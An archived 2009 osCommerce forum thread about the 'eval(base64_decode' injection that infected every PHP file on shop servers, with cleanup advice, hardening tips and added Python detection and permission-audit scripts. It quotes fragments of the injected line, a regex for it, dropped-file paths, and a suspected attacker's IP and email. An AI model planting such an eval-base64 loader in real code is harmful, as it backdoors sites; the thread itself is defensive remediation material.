
eval(base64_decode Hack


This topic has been archived. This means that you cannot reply to this topic.
125 replies to this topic

#1   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 01 October 2009 - 10:23 AM

eval(base64_decode hack going around the internet.

If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack.
Some of the more common signs of this are
* Category images stop displaying
* FCK editor refuses to display images folder
* Payment modules stop working
* Checkout process stops working

How will you know?
Open any PHP file on your server, if at the very top you see a line like
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while)
Then you have been hacked.

To clean your site you have two options,
1, Delete the entire set of PHP files on your server (this hack will infect every single PHP file regardless of where it belongs, i.e. non-osC files will also be infected) and restore from a good backup. This is the best and easiest route.

2, You need to find the source of the files that have been placed on your server; they are always hidden well away from the top level. To do this you need to copy the top line and paste it into a Base64 decoder. I have my own file for this, but you will be able to use any of the many on the internet, here is one

This will reveal the location of the files you have to remove. Note that it could be from 1 file up to 30, and in some cases they will overwrite the files that should be in the host folder.

Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line. I suggest you use a search / replace tool for this or it's going to take you a very long time!

When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens.

Now your site is free of the code, you need to prevent it from happening again.

How to prevent infection.

This is not guaranteed 100% proof but it is going to help stop re-infection.

Change the name of your admin folder to something less obvious.
Delete admin/filemanager.php and associated links.
Ensure that your folder permissions are never set higher than 755
Install some security addons,
Also some ideas from this post can help you,
If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when.
There is a lot of fragmented help on the forums; I have pulled some of it together here. Read up all you can, there are a lot of great people posting good information here.
Sometimes you're the dog and sometimes the lamp post

My Contributions
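As an added example, not part of FIMBLE's post or of osCommerce itself: a small Python scanner that performs the detection and decoding steps described above offline, without ever executing the payload. It flags PHP files whose first line is the eval(base64_decode('...')) prefix, decodes the base64 to list the file paths the payload refers to (where the dropped files live), and strips the prefix from a file's content (the search/replace step). The infected sample, the inert stand-in payload and the directory layout are all constructed inline for the demo.

```python
import base64, binascii, os, re, tempfile

# The injected prefix the thread describes: one eval(base64_decode('...')) line pushed
# in front of the file's real <?php tag. The payload is only decoded, never executed.
INJECT_RE = re.compile(r"^<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>\s*")
PATH_RE = re.compile(r"/[\w./-]+\.(?:php|swf|css)")  # files the payload points at

def find_injection(text):
    # Decoded payload if the file starts with the injected line, else None.
    m = INJECT_RE.match(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except binascii.Error:
        return ""  # malformed base64 is still an injection, just an unreadable one

def referenced_paths(payload):
    return sorted(set(PATH_RE.findall(payload)))

def strip_injection(text):
    # The file content with the injected prefix removed (the search/replace step).
    m = INJECT_RE.match(text)
    return text[m.end():] if m else text

def scan_tree(root):
    # Map each infected .php file (relative to root) to the paths its payload names.
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    payload = find_injection(fh.read())
                if payload is not None:
                    rel = os.path.relpath(full, root).replace(os.sep, "/")
                    findings[rel] = referenced_paths(payload)
    return findings

# Constructed sample (not real malware): an inert payload that only names a dropped file.
DROPPED = "/catalog/includes/languages/english/modules/shipping/style.css.php"
PAYLOAD = "if(function_exists('ob_start')){include('%s');}" % DROPPED
CLEAN_TEXT = "<?php\n/*\n  $Id: index.php $\n*/\n  require('includes/application_top.php');\n"
INFECTED_TEXT = "<?php /**/eval(base64_decode('%s'));?>\n" % base64.b64encode(PAYLOAD.encode()).decode() + CLEAN_TEXT
def demo():  # write one infected and one clean file into a temp tree, then scan it
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "includes"))
        for rel, text in (("index.php", INFECTED_TEXT), ("includes/application_top.php", CLEAN_TEXT)):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(text)
        return scan_tree(root)
```

Pointing scan_tree at a real document root lists every infected file together with the paths to check for dropped files; compare that list against a clean backup before deleting anything.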

#2   pinklep

pinklep
  • Members
  • 95 posts

Posted 01 October 2009 - 01:10 PM

FIMBLE, on Oct 1 2009, 04:23 AM, said:

eval(base64_decode hack going around the internet.

Thank you very much for the information. I found a file called NuSoup.php that I don't recognize. Could this be a file used for hacking?
I am a Jedi, like my father before me!

#3   ecartz

ecartz
  • Members
  • 1,964 posts

Posted 01 October 2009 - 02:31 PM

FIMBLE, on Oct 1 2009, 06:23 AM, said:

Ensure that your folder permissions are never set higher than 755
It's worth noting that ownership is as important as permissions.  If the web user owns the folder, then folder permissions of 755 are effectively as insecure as 777.  If the configure.php file requires 444 permissions for the warning to turn off, then no file or directory should be writable, i.e. 444 permissions for files and 555 permissions for directories.  

A better solution would be to have the web user be some account other than the main user account, but many hosts do not seem to support that.
Always backup before making changes.
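To make ecartz's point concrete, an added example in Python (not from the thread or from osCommerce): it applies the Unix rule that ownership decides which permission bits count, so a 755 directory owned by the web server user is as writable by it as a 777 one, and audits a document root for entries that user could modify. The directory layout and uid/gid values are constructed for the demo, with the current user standing in for the web server user.

```python
import os, stat, tempfile

def writable_by(st, uid, gid):
    # Could a process running as (uid, gid) write the entry described by st?
    # Ownership decides which permission bits apply, so a 755 directory whose
    # owner is the web user is writable by the web user, while 777 is writable by all.
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid == gid:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def fake_stat(mode, uid, gid):
    # Build a stat_result by hand so the rule can be checked without touching disk.
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))

def audit(root, uid, gid):
    # Sorted relative paths under root that the web server user (uid, gid) could modify.
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            if writable_by(os.lstat(full), uid, gid):
                hits.append(os.path.relpath(full, root).replace(os.sep, "/"))
    return sorted(hits)

def demo():
    # Constructed docroot owned by the current user, who plays the web server user.
    # Returns what the audit flags for the owner and for an unrelated (uid, gid).
    with tempfile.TemporaryDirectory() as root:
        for name, mode in {"images": 0o755, "includes": 0o555}.items():
            os.mkdir(os.path.join(root, name))
            os.chmod(os.path.join(root, name), mode)
        for name, mode in {"index.php": 0o644, "configure.php": 0o444}.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write("<?php\n")
            os.chmod(os.path.join(root, name), mode)
        as_owner = audit(root, os.getuid(), os.getgid())
        as_other = audit(root, -1, -1)  # ids that match no owner or group
        return as_owner, as_other
```

On a shared host where PHP runs as your own account, pass your uid and gid to audit; anything it lists is writable by the scripts the attacker gets to run.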

#4   jonatanvalencia

jonatanvalencia
  • Members
  • 12 posts

Posted 02 October 2009 - 01:07 AM

Damn, I am hacked. I saw that line a month ago and I thought it was strange, but it didn't catch enough of my attention.

Now I saw some product_info.php/?fxkp=0'>forex online system trading stuff above my body HTML code and I said it was impossible.

I hope to clean up my whole sites.

Regards

#5   PapaJohnL

PapaJohnL
  • Members
  • 1 posts

Posted 02 October 2009 - 05:15 PM

FYI on this hack... I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to PHP files. So, it would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker?

For what it's worth, in case any of you have a forum, he is registering under the name ben_edit@yahoo.com

Edited by PapaJohnL, 02 October 2009 - 05:20 PM.


#6   Coopco

Coopco
  • Members
  • 9,557 posts

Posted 02 October 2009 - 05:34 PM

PapaJohnL, on Oct 3 2009, 03:15 AM, said:

FYI on this hack... I found where it appears as though the hack came through my community forum to get to my site. My forum admin recorded the IP address along with what looks to be all the attempts to get in to PHP files. So, it would certainly appear as though this was the attacker. The IP 98.206.239.156 registers out of Aurora Illinois. Anyone have the capabilities to research this IP to see if it is the hacker?

For what it's worth, in case any of you have a forum, he is registering under the name ben_edit@yahoo.com
My list of banned IPs continues to grow.


The Coopco Underwear Shop



If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

#7   germ

germ
  • Members
  • 13,921 posts

Posted 03 October 2009 - 01:06 AM

Someone else posted that their hack came from a server in a Chevy van somewhere along the arctic circle...
:huh:

Like vultures to a rotting carcass...
:o
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."
- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help


#8   Jet200

Jet200
  • Members
  • 106 posts

Posted 03 October 2009 - 06:32 AM

Question on the database restore part...

Will I lose any info that I've acquired from infection (9/22) until now?

#9   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 03 October 2009 - 08:41 AM

Jet200, on Oct 3 2009, 07:32 AM, said:

Question on the database restore part...

Will I lose any info that I've acquired from infection (9/22) until now?

Yes you will, restoring will take your database and all information contained within back to the restore date.
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#10   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 03 October 2009 - 08:44 AM

pinklep, on Oct 1 2009, 02:10 PM, said:

Thank you very much for the information. I found a file called NuSoup.php that I don't recognize. Could this be a file used for hacking?

There is a nusoap.php; is that what you mean?
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#11   birdmantx

birdmantx
  • Members
  • 96 posts

Posted 04 October 2009 - 02:44 PM

I also have been hacked and found the malicious code. I banned an IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious.

I used the decode hack and it didn't work for me. Can someone tell me which files were planted and need to be removed?

What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked.

Weird thing is my site works just fine, but the code is in every PHP file, and the company Forex is listed a million times behind each page in the body.
Flying away to get back to work.

#12   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 04 October 2009 - 08:14 PM

There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery.
You really need to decode the line to find the place that the files are located in.
There can be a lot of files or one or two, and called different names.
style.css.php is one
dg.php another
there are .swf files also

With the decoder just add the code minus the <?php (' at the start and the ')?> at the end
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#13   geode vibrations

geode vibrations
  • Members
  • 4 posts

Posted 04 October 2009 - 08:33 PM

To clean your site you have two options,
1, Delete the entire set of PHP files on your server (this hack will infect every single PHP file regardless of where it belongs, i.e. non-osC files will also be infected) and restore from a good backup. This is the best and easiest route.


Hello, can you help?

Followed advice and I was infected. Have been through all files and removed all PHP from server. I assume that restore is done from osCommerce admin. When I go to access this I have deleted shop/admin/login.php and so can't access it to reload. I know my product information is still there in files, pics etc. How can I get the missing PHP so I can restore?

#14   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 04 October 2009 - 08:38 PM

Hi, you can use one from backup, or you can download a fresh copy of your osCommerce version and upload the file from that.
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#15   birdmantx

birdmantx
  • Members
  • 96 posts

Posted 04 October 2009 - 09:33 PM

Hello,

I have tried so many ways to use the decoder you recommend, with no luck. Here is the code:

**/eval(base64_decode('[base64 string removed]')); ?>
<?php
/*
  $Id: index.php 1739 2007-12-20 00:52:16Z hpdl $

  osCommerce, Open Source E-Commerce Solutions
  http://www.oscommerce.com

  Copyright © 2003 osCommerce

  Released under the GNU General Public License
*/

  require('includes/application_top.php');

// the following cPath references come from application_top.php
  $category_depth = 'top';
  if (isset($cPath) && tep_not_null($cPath)) {
    $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . (int)$current_category_id . "'");
    $cateqories_products = tep_db_fetch_array($categories_products_query);
    if ($cateqories_products['total'] > 0) {
      $category_depth = 'products'; // display products
    } else {
      $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . (int)$current_category_id . "'");
      $category_parent = tep_db_fetch_array($category_parent_query);
      if ($category_parent['total'] > 0) {
        $category_depth = 'nested'; // navigate through the categories
      } else {
        $category_depth = 'products'; // category has no products, but display the 'no products' message
      }
    }
  }
  
// BOF edit pages
$pages_name = "home";
$page_query = tep_db_query("select pd.pages_title, pd.pages_body, p.pages_id
Flying away to get back to work.

#16   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 04 October 2009 - 09:36 PM

here it is
'/catalog/includes/languages/english/modules/shipping/style.css.php

For anyone else having problems you need to strip the tags and apostrophes so it looks like

[base64 string removed]

Nic

Edited by FIMBLE, 04 October 2009 - 09:36 PM.

Sometimes you're the dog and sometimes the lamp post

My Contributions

#17   birdmantx

birdmantx
  • Members
  • 96 posts

Posted 04 October 2009 - 09:42 PM

FIMBLE, on 04 October 2009 - 09:36 PM, said:

here it is
'/catalog/includes/languages/english/modules/shipping/style.css.php

Nic

So besides cleaning or replacing each php file, is that the only file that needs to be removed?
Flying away to get back to work.

#18   FIMBLE

FIMBLE
  • Members
  • 6,604 posts

Posted 04 October 2009 - 09:44 PM

You need to compare the folder contents with either your backup or another trusted source; as I've said a few times here, there can be many new files added.
You will be better off deleting the folder and uploading a good one.
Nic
Sometimes you're the dog and sometimes the lamp post

My Contributions

#19   birdmantx

birdmantx
  • Members
  • 96 posts

Posted 05 October 2009 - 01:41 AM

Nic found 35 hidden files in my site that didn't belong there. One of the files was style.css, some people might have missed that one. He cleaned all the files and my site is perfect now.

I have one question though. The malicious code advertised the company Forex all over my site behind the pages. I have heard hackers do this to get higher rankings in search engines that spider our sites. Does this mean someone who works for Forex did this?

Even though my team the Dallas Cowboys lost, I can sleep good knowing my site is up and running.

Funny, I am sleeping when most of you are awake and vice versa.

Best wishes!
Sam- in Texas
Flying away to get back to work.

#20   fijiislander

fijiislander
  • Members
  • 7 posts

Posted 05 October 2009 - 02:55 AM

Joining the club - Hacked - and my team lost again today.

I can confirm that any php file, even simple redirects in subdomains, will get nailed.  Incidentally I had 755 as the minimum, but now I know better.

Anyone know if they are smart enough to hide these files in directories other than osCommerce, such as WordPress or Joomla?

Obviously the authors "like" osCommerce.